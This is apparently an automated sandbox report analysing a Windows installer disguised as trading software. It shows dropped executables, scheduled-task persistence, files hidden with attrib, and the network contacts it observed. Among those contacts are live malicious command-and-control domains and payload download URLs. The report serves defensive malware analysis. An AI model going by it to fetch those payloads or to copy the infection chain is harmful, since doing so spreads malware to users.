tinyurl.com 104.18.111.161, 443, 49733 CLOUDFLARENETUS United States 36->107 61 C:\Users\user\AppData\Local\Temp\...\lang, XML 36->61 dropped 63 C:\Users\user\AppData\Local\Temp\...\idp.exe, PE32 36->63 dropped 65 C:\Users\user\AppData\Local\Temp\...\idp.dll, PE32 36->65 dropped 67 2 other files (none is malicious) 36->67 dropped 131 Uses schtasks.exe or at.exe to add and modify task schedules 36->131 41 cmd.exe 1 36->41         started        44 idp.exe 2 36->44         started        47 cmd.exe 1 36->47         started        49 schtasks.exe 1 36->49         started        file16 signatures17 process18 file19 133 Uses attrib.exe to hide files 41->133 51 conhost.exe 41->51         started        53 attrib.exe 1 41->53         started        93 C:\Users\user\AppData\Local\...\yyttrsu.exe, PE32 44->93 dropped 55 conhost.exe 44->55         started        57 conhost.exe 47->57         started        59 conhost.exe 49->59         started        signatures20 process21

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      XS_Trade_AI-newest_release_.exe0%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_uuid.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\libcrypto-1_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\libffi-7.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\libssl-1_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\python39.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\select.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\VCRUNTIME140.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_asyncio.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_bz2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_ctypes.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_decimal.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_hashlib.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_lzma.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_multiprocessing.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_overlapped.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_queue.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_socket.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_ssl.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_uuid.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\libcrypto-1_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\libffi-7.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\libssl-1_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\pyexpat.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\python39.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\select.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\unicodedata.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-342QK.tmp\DontSleep_x64.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-342QK.tmp\_isetup\_setup64.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-342QK.tmp\idp.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp2%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp2%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\_isetup\_setup64.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://schemas.micro0%URL Reputationsafe
      http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
      http://www.innosetup.com/0%URL Reputationsafe
      http://ocsp.thawte.com00%URL Reputationsafe
      https://www.openssl.org/H0%URL Reputationsafe
      http://www.remobjects.com/ps0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      tinyurl.com
      		104.18.111.161
      		truefalse
        		unknown
        revordirecut.cyou
        		104.21.83.166
        		truetrue
          		unknown
          rentry.org
          		164.132.58.105
          		truefalse
            		unknown
            dl.jrdesklabs.com
            		135.181.116.240
            		truefalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              contemteny.sitetrue
                		unknown
                https://dl.jrdesklabs.com/yyttrsu.zipfalse
                  		unknown
                  opposezmny.sitetrue
                    		unknown
                    servicedny.sitetrue
                      		unknown
                      https://revordirecut.cyou/apitrue
                        		unknown
                        goalyfeastz.sitetrue
                          		unknown
                          https://tinyurl.com/ec75f7fnfalse
                            		unknown
                            https://rentry.org/55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419/rawfalse
                              		unknown
                              authorisev.sitetrue
                                		unknown
                                faulteyotk.sitetrue
                                  		unknown
                                  seallysl.sitetrue
                                    		unknown
                                    revordirecut.cyoutrue
                                      		unknown
                                      dilemmadu.sitetrue
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.ntcore.com/files/richsign.htmtaskshosts.exe, 00000010.00000003.1956237011.000000000320E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956572480.000000000324D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1978000920.00000000030B0000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041338255.0000000003291000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041550731.00000000032D8000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2064702449.0000000002BC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://dl.jrdesklabs.com/YXS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.python.org/download/releases/2.3/mro/.taskshosts.exe, 00000010.00000003.1945392433.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977713653.0000000002990000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945604788.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945195148.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2030520486.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2064373901.0000000002A40000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUXS_Trade_AI-newest_release_.exefalse
                                                		unknown
                                                https://rentry.org/55d46ea0c6e974cfc3eXyXS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#taskshosts.exe, 00000010.00000003.1946767372.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945308077.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948778563.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944431721.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944137115.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946211095.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943811652.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945604788.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1940817547.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946363592.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948914833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943649915.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943771821.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977397483.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974621104.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1942121225.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944747106.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943980082.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943181254.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974481328.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2028961462.0000000000D63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://schemas.microXS_Trade_AI-newest_release_.tmp, 00000003.00000003.1918594917.0000000002282000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://crl3.digitaskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016815643.000000000124E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.kymoto.orgqXS_Trade_AI-newest_release_.tmp, 00000001.00000003.1841392473.000000000244D000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1918594917.000000000226D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://dl.jrdesklabs.com/yyttrsu.zipUUXS_Trade_AI-newest_release_.tmp, 00000003.00000003.1914645489.0000000004005000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://revordirecut.cyou/api9ngentask.exe, 00000015.00000002.2192127076.0000000000C8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://revordirecut.cyou/ngentask.exe, 00000015.00000002.2191328836.0000000000C07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://crl.thawte.com/ThawteTimestampingCA.crl0taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018370501.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.resplendence.com/XS_Trade_AI-newest_release_.exe, 00000000.00000003.1783740961.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1830205872.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1789233262.0000000003490000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1841392473.00000000023F5000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1904656093.000000007F4F0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1918594917.0000000002233000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1906019015.000000007F720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://crl4.digicetaskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2024149236.000000000125C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://www.mandiant.com/resources/blog/tracking-malware-import-hashingtaskshosts.exe, 00000010.00000002.1978563416.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956237011.000000000320E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956572480.000000000324D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956307683.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041338255.0000000003291000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2065594673.0000000003380000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041550731.00000000032D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://schemas.microsoft.coXS_Trade_AI-newest_release_.tmp, 00000003.00000003.1918594917.00000000022E2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://tinyurl.com/XS_Trade_AI-newest_release_.tmp, 00000003.00000002.1922270385.0000000000978000.00000004.00000020.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.0000000000A51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.innosetup.com/XS_Trade_AI-newest_release_.exe, 00000000.00000003.1785573250.000000007F9B0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exe, 00000000.00000003.1785088094.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000000.1786925633.0000000000401000.00000020.00000001.01000000.00000004.sdmp, XS_Trade_AI-newest_release_.tmp.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688taskshosts.exe, 00000010.00000002.1977754077.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1940817547.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1942121225.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2028961462.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2029040943.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2064423657.0000000002A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://rentry.org/55d46ea0c6e974cfc3eXS_Trade_AI-newest_release_.tmpfalse
                                                                            		unknown
                                                                            https://revordirecut.cyou/apiFXngentask.exe, 00000015.00000002.2191328836.0000000000C07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://auscitte.github.io/systems%20blog/Exception-Directory-pefile#implementation-detailstaskshosts.exe, 00000010.00000002.1978563416.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956237011.000000000320E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956572480.000000000324D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041338255.0000000003291000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2065594673.0000000003380000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041550731.00000000032D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.kymoto.orgAboutXS_Trade_AI-newest_release_.exe, 00000000.00000003.1783740961.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exe, 00000000.00000003.1844353581.000000000230C000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1841392473.000000000246A000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1789233262.0000000003490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://ocsp.thawte.com0taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018370501.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readertaskshosts.exe, 00000010.00000003.1946767372.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945308077.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948778563.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944431721.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944137115.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946211095.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943811652.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945604788.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1940817547.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946363592.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948914833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943649915.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943771821.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977397483.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974621104.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1942121225.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944747106.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943980082.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943181254.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974481328.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2028961462.0000000000D63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://www.python.org/dev/peps/pep-0205/taskshosts.exe, 0000000F.00000003.1933674558.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977960530.0000000003070000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2026766272.000000000124F000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2064641634.0000000002B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://revordirecut.cyou:443/apingentask.exe, 00000015.00000002.2191950905.0000000000C71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.kymoto.orgXS_Trade_AI-newest_release_.exe, 00000000.00000003.1844353581.000000000230C000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exe, 00000002.00000003.1924488149.00000000021F1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://schemas.micrXS_Trade_AI-newest_release_.tmp, 00000003.00000003.1918594917.0000000002282000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://jrsoftware.github.io/issrc/ISHelp/isxfunc.xmlXS_Trade_AI-newest_release_.exe, 00000000.00000003.1783740961.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1830205872.000000007FCE9000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1789233262.0000000003490000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828227868.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1904656093.000000007F4F0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1906019015.000000007F720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sytaskshosts.exe, 00000010.00000003.1946767372.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945308077.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948778563.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944431721.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944137115.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946211095.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943811652.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945604788.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1940817547.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946363592.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948914833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943649915.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943771821.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977397483.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974621104.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1942121225.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944747106.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943980082.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943181254.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974481328.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2028961462.0000000000D63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://dl.jrdesklabs.com/XS_Trade_AI-newest_release_.tmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://127.0.0.1/innosetup/index.htmXS_Trade_AI-newest_release_.exe, 00000000.00000003.1783740961.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828489513.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1830205872.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1789233262.0000000003490000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1904656093.000000007F4F0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1906019015.000000007F720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://www.openssl.org/Htaskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018519903.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://crl3.digi_taskshosts.exe, 00000013.00000003.2015504389.000000000124D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://www.remobjects.com/psXS_Trade_AI-newest_release_.exe, 00000000.00000003.1785573250.000000007F9B0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exe, 00000000.00000003.1785088094.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000000.1786925633.0000000000401000.00000020.00000001.01000000.00000004.sdmp, XS_Trade_AI-newest_release_.tmp.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pytaskshosts.exe, 00000014.00000002.2063418093.0000000000D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://localhost:8191/index.htmlXS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.00000000035D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		unknown

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          164.132.58.105
                                                                                                          		rentry.orgFrance
                                                                                                          		16276OVHFRfalse
                                                                                                          104.18.111.161
                                                                                                          		tinyurl.comUnited States
                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                          104.21.83.166
                                                                                                          		revordirecut.cyouUnited States
                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                          135.181.116.240
                                                                                                          		dl.jrdesklabs.comGermany
                                                                                                          		24940HETZNER-ASDEfalse

                                                                                                          General Information

                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1543888
                                                                                                          Start date and time:2024-10-28 15:48:36 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 9m 8s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:24
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
